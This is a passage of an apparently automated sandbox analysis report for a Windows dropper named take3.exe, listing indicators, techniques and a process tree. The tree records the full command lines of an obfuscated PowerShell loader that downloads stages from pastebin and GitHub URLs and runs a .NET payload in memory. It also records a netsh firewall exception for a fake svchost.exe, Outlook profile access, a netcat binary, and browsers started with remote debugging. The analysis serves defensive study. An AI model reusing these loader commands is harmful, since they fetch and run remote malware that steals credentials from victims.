taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe 5392 taskmgr.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 1704 PCclear_Eng_mini.exe 1704 PCclear_Eng_mini.exe 5588 ipscan221.exe 5588 ipscan221.exe 5816 %EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe 3048 OpenWith.exe 3192 mstsc.exe 2332 me.exe 2332 me.exe 2208 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2476 wrote to memory of 3516 2476 take3.exe 79 PID 2476 wrote to memory of 3516 2476 take3.exe 79 PID 3516 wrote to memory of 1660 3516 take3.exe 80 PID 3516 wrote to memory of 1660 3516 take3.exe 80 PID 3516 wrote to memory of 1660 3516 take3.exe 80 PID 3516 wrote to memory of 4160 3516 take3.exe 81 PID 3516 wrote to memory of 4160 3516 take3.exe 81 PID 4160 wrote to memory of 2940 4160 WScript.exe 82 PID 4160 wrote to memory of 2940 4160 WScript.exe 82 PID 2940 wrote to memory of 3124 2940 powershell.exe 84 PID 2940 wrote to memory of 3124 2940 powershell.exe 84 PID 3124 wrote to memory of 860 3124 powershell.exe 85 PID 3124 wrote to memory of 860 3124 powershell.exe 85 PID 3124 wrote to memory of 2880 3124 powershell.exe 86 PID 3124 wrote to memory of 2880 3124 powershell.exe 86 PID 3516 wrote to memory of 2372 3516 take3.exe 87 PID 3516 wrote to memory of 2372 3516 take3.exe 87 PID 3516 wrote to memory of 2372 3516 take3.exe 87 PID 2372 wrote to memory of 3100 2372 gvndxfghs.exe 88 PID 2372 wrote to memory of 3100 2372 gvndxfghs.exe 88 PID 2372 wrote to memory of 3100 2372 gvndxfghs.exe 88 PID 2372 wrote to memory of 3100 2372 gvndxfghs.exe 88 PID 2372 wrote to memory of 3100 2372 gvndxfghs.exe 88 PID 2372 wrote to memory of 3100 2372 gvndxfghs.exe 88 PID 2372 wrote to memory of 3100 2372 gvndxfghs.exe 88 PID 2372 wrote to memory of 3100 2372 gvndxfghs.exe 88 PID 2372 wrote to memory of 3100 2372 gvndxfghs.exe 88 PID 2372 wrote to memory of 4576 2372 gvndxfghs.exe 89 PID 2372 wrote to memory of 4576 2372 gvndxfghs.exe 89 PID 2372 wrote to memory of 4576 2372 gvndxfghs.exe 89 PID 2372 wrote to memory of 4576 2372 gvndxfghs.exe 89 PID 2372 wrote to memory of 4576 2372 gvndxfghs.exe 89 PID 2372 wrote to memory of 4576 2372 gvndxfghs.exe 89 PID 2372 wrote to memory of 4576 2372 gvndxfghs.exe 89 PID 2372 wrote to memory of 4576 2372 gvndxfghs.exe 89 PID 2372 wrote to memory of 4576 2372 gvndxfghs.exe 89 PID 2372 wrote to memory of 4516 2372 gvndxfghs.exe 90 PID 2372 wrote to memory of 4516 2372 gvndxfghs.exe 90 PID 2372 wrote to memory of 4516 2372 gvndxfghs.exe 90 PID 2372 wrote to memory of 4516 2372 gvndxfghs.exe 90 PID 2372 wrote to memory of 4516 2372 gvndxfghs.exe 90 PID 2372 wrote to memory of 4516 2372 gvndxfghs.exe 90 PID 2372 wrote to memory of 4516 2372 gvndxfghs.exe 90 PID 2372 wrote to memory of 4516 2372 gvndxfghs.exe 90 PID 2372 wrote to memory of 4516 2372 gvndxfghs.exe 90 PID 3516 wrote to memory of 4912 3516 take3.exe 91 PID 3516 wrote to memory of 4912 3516 take3.exe 91 PID 3516 wrote to memory of 4912 3516 take3.exe 91 PID 3124 wrote to memory of 4408 3124 powershell.exe 95 PID 3124 wrote to memory of 4408 3124 powershell.exe 95 PID 1660 wrote to memory of 4524 1660 dsd.exe 96 PID 1660 wrote to memory of 4524 1660 dsd.exe 96 PID 1660 wrote to memory of 4524 1660 dsd.exe 96 PID 3516 wrote to memory of 4540 3516 take3.exe 97 PID 3516 wrote to memory of 4540 3516 take3.exe 97 PID 3516 wrote to memory of 3544 3516 take3.exe 99 PID 3516 wrote to memory of 3544 3516 take3.exe 99 PID 3516 wrote to memory of 3756 3516 take3.exe 101 PID 3516 wrote to memory of 3756 3516 take3.exe 101 PID 3516 wrote to memory of 3756 3516 take3.exe 101 PID 4524 wrote to memory of 3848 4524 svchost.exe 102 PID 4524 wrote to memory of 3848 4524 svchost.exe 102 PID 4524 wrote to memory of 3848 4524 svchost.exe 102 PID 3516 wrote to memory of 4892 3516 take3.exe 104 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 5680 attrib.exe 2472 attrib.exe 1880 attrib.exe 2292 attrib.exe -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook gvndxfghs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook gvndxfghs.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3264
-
C:\Users\Admin\AppData\Local\Temp\take3.exe"C:\Users\Admin\AppData\Local\Temp\take3.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Users\Admin\AppData\Local\Temp\take3.exe"C:\Users\Admin\AppData\Local\Temp\take3.exe"3⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3848
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\UrlHausFiles\aa.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:4160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹QQBk☹HY☹OQBn☹EI☹S☹Bh☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Bo☹G4☹a☹Bu☹HY☹I☹☹9☹C☹☹Jw☹w☹Cc☹I☹☹7☹CQ☹awBq☹GE☹dwBz☹C☹☹PQ☹g☹Cc☹JQBK☹Gs☹UQBh☹HM☹R☹Bm☹Gc☹cgBU☹Gc☹JQ☹n☹C☹☹OwBb☹EI☹eQB0☹GU☹WwBd☹F0☹I☹☹k☹GE☹bwB1☹GY☹c☹☹g☹D0☹I☹Bb☹HM☹eQBz☹HQ☹ZQBt☹C4☹QwBv☹G4☹dgBl☹HI☹d☹Bd☹Do☹OgBG☹HI☹bwBt☹EI☹YQBz☹GU☹Ng☹0☹FM☹d☹By☹Gk☹bgBn☹Cg☹I☹☹k☹FE☹U☹B0☹GE☹dg☹u☹HI☹ZQBw☹Gw☹YQBj☹GU☹K☹☹n☹CQ☹J☹☹n☹Cw☹JwBB☹Cc☹KQ☹g☹Ck☹I☹☹7☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBB☹H☹☹c☹BE☹G8☹bQBh☹Gk☹bgBd☹Do☹OgBD☹HU☹cgBy☹GU☹bgB0☹EQ☹bwBt☹GE☹aQBu☹C4☹T☹Bv☹GE☹Z☹☹o☹CQ☹YQBv☹HU☹ZgBw☹Ck☹LgBH☹GU☹d☹BU☹Hk☹c☹Bl☹Cg☹JwBU☹GU☹a☹B1☹Gw☹YwBo☹GU☹cwBY☹Hg☹W☹B4☹Hg☹LgBD☹Gw☹YQBz☹HM☹MQ☹n☹Ck☹LgBH☹GU☹d☹BN☹GU☹d☹Bo☹G8☹Z☹☹o☹Cc☹TQBz☹HE☹QgBJ☹GI☹WQ☹n☹Ck☹LgBJ☹G4☹dgBv☹Gs☹ZQ☹o☹CQ☹bgB1☹Gw☹b☹☹s☹C☹☹WwBv☹GI☹agBl☹GM☹d☹Bb☹F0☹XQ☹g☹Cg☹JwBj☹G0☹cg☹x☹HY☹cw☹v☹G4☹aQBh☹G0☹LwBz☹GQ☹YQBl☹Gg☹LwBz☹GY☹ZQBy☹C8☹ZQBy☹Gk☹Zg☹v☹GE☹b☹Bs☹Gk☹dQBx☹G4☹YQBy☹HI☹YQBi☹DQ☹Mg☹w☹DI☹bgBv☹Gk☹c☹Bt☹GE☹a☹Bj☹C8☹bQBv☹GM☹LgB0☹G4☹ZQB0☹G4☹bwBj☹HI☹ZQBz☹HU☹YgB1☹Gg☹d☹Bp☹Gc☹LgB3☹GE☹cg☹v☹C8☹OgBz☹H☹☹d☹B0☹Gg☹Jw☹g☹Cw☹I☹☹k☹Gs☹agBh☹Hc☹cw☹g☹Cw☹I☹☹n☹Hc☹aQBu☹DY☹N☹Bi☹Gk☹d☹☹n☹Cw☹I☹☹k☹Gg☹bgBo☹G4☹dg☹s☹C☹☹Jw☹x☹Cc☹L☹☹g☹Cc☹UgBv☹GQ☹YQ☹n☹C☹☹KQ☹p☹Ds☹';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\Downloads\UrlHausFiles\aa.vbs');powershell $Yolopolhggobek;5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/Adv9gBHa' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hnhnv = '0' ;$kjaws = 'C:\Users\Admin\Downloads\UrlHausFiles\aa.vbs' ;[Byte[]] $aoufp = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($aoufp).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('cmr1vs/niam/sdaeh/sfer/erif/alliuqnarrab4202noipmahc/moc.tnetnocresubuhtig.war//:sptth' , $kjaws , 'win64bit', $hnhnv, '1', 'Roda' ));"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c7⤵PID:860
-
-
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.17⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4408
-
-
-
-
-
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe"C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exeC:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe5⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3100
-
-
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exeC:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe5⤵
- Executes dropped EXE
PID:4576
-
-
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exeC:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe5⤵
- Executes dropped EXE
PID:4516
-
-
-
C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe"C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4912 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 7645⤵
- Program crash
PID:4752
-
-
-
C:\Users\Admin\Downloads\UrlHausFiles\nc64.exe"C:\Users\Admin\Downloads\UrlHausFiles\nc64.exe"4⤵
- Executes dropped EXE
PID:4540
-
-
C:\Users\Admin\Downloads\UrlHausFiles\bp.exe"C:\Users\Admin\Downloads\UrlHausFiles\bp.exe"4⤵
- Executes dropped EXE
PID:3544
-
-
C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3756
-
-
C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4892 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4120 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe070acc40,0x7ffe070acc4c,0x7ffe070acc586⤵PID:3344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1780,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1792 /prefetch:26⤵PID:3328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1976,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2080 /prefetch:36⤵PID:2404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2188,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2376 /prefetch:86⤵PID:2880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:16⤵
- Uses browser remote debugging
PID:228
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3236 /prefetch:16⤵
- Uses browser remote debugging
PID:3996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4544,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4484 /prefetch:16⤵
- Uses browser remote debugging
PID:4708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4856,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4924 /prefetch:86⤵PID:1944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4948,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:86⤵PID:2428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4728,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:86⤵PID:2480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5168,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5164 /prefetch:86⤵PID:5048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5076,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5100 /prefetch:86⤵PID:1940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4808,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5312 /prefetch:86⤵PID:3920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5352,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5216 /prefetch:26⤵
- Uses browser remote debugging
PID:1844
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:884 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe070b3cb8,0x7ffe070b3cc8,0x7ffe070b3cd86⤵PID:4852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1852 /prefetch:26⤵PID:2484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:4772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2588 /prefetch:86⤵PID:2332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:16⤵
- Uses browser remote debugging
PID:2960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:16⤵
- Uses browser remote debugging
PID:984
-
-
